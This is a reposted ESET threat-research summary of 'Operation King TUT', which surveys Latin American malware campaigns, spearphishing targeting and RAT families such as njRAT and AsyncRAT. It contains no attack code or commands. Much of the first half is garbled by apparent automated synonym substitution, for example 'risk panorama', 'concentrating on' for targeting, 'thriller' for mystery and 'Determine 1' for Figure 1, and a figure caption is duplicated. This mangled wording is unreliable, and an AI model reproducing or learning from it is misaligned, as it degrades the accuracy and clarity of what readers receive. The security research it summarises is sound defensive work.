The Universe of Threats in LATAM

ESET Analysis

ESET researchers reveal a rising sophistication in threats affecting the LATAM area by using evasion methods and high-value concentrating on

Operation King TUT: The universe of threats in LATAM

Very similar to the life and mysterious demise of Pharaoh Tutankhamun, also referred to as King Tut, the risk panorama in Latin America (LATAM) stays shrouded in thriller. That is primarily because of the restricted international consideration on the evolving malicious campaigns inside the area. Whereas notable occasions like ATM attacks, the banking trojans born in Brazil, and the Machete cyberespionage operations have garnered media protection, we’re conscious that there’s extra to the story.

In a parallel to how archaeological excavations of King Tut’s tomb make clear historic Egyptian life, we launched into a journey to delve into less-publicized cyberthreats affecting Latin American nations. Our initiative, named Operation King TUT (The Universe of Threats), sought to discover this vital risk panorama. On October fifth, we offered the outcomes of our comparative evaluation on the Virus Bulletin 2023 conference: the total convention paper may be learn here.

Within the evaluation, we selected to look again at varied publicly documented campaigns concentrating on the LATAM area between 2019 and 2023, as may be seen within the timeline under. All of those cybercriminal actions are detected solely in Latin America and are usually not related to international crimeware. Since every of those operations has its personal distinctive traits and doesn’t seem linked to any identified risk actor, it’s extremely seemingly that a number of actors are at play.

Figure 1 - Timeline of publications on attacks in LATAM, tracked by ESET
Determine 1. Timeline of publications on assaults in LATAM, tracked by ESET

Our analysis revealed a notable shift from simplistic, opportunistic crimeware to extra complicated threats. Notably, now we have noticed a transition in concentrating on, transferring from a concentrate on most of the people to high-profile customers, together with companies and governmental entities. These risk actors regularly replace their instruments, introducing totally different evasion methods to extend the success of their campaigns. Moreover, they’ve expanded their crimeware enterprise past Latin America, mirroring the sample seen in banking trojans born in Brazil.

Our comparison also shows that the majority of malicious campaigns seen in the region are directed at enterprise users, including government sectors, by employing primarily spearphishing emails to reach potential victims, often masquerading as recognized organizations within specific countries in the region, particularly government or tax entities.

The precision and specificity observed in these attacks point to a high level of targeting, indicating that the threat actors have detailed knowledge about their intended victims. In these campaigns, attackers utilize malicious components like downloaders and droppers, mostly created in PowerShell and VBS.

Regarding the tools used in these malicious operations in Latin America, our observations indicate a preference for RATs, particularly from the njRAT and AsyncRAT families. Additionally, in campaigns primarily targeting government entities, we have identified the use of other malware families like Bandook and Remcos, albeit to a lesser extent.

Based on the conclusions resulting from our comparison, we believe that there is more than just one group behind the proliferation of these types of campaigns and that these groups are actively looking into different techniques and ways for their campaigns to be as successful as possible. Additionally, we suspect that socioeconomic disparities prevalent in Latin America may influence the modus operandi of attackers in this region, although this particular aspect falls beyond the scope of our research. The full VB2023 conference paper about Operation King TUT is available here.

Aggregated indicators of compromise (IoCs) can be found on our GitHub repository.

For any inquiries about our analysis revealed on WeLiveSecurity, please contact us at [email protected].

ESET Analysis presents personal APT intelligence studies and information feeds. For any inquiries about this service, go to the ESET Threat Intelligence web page.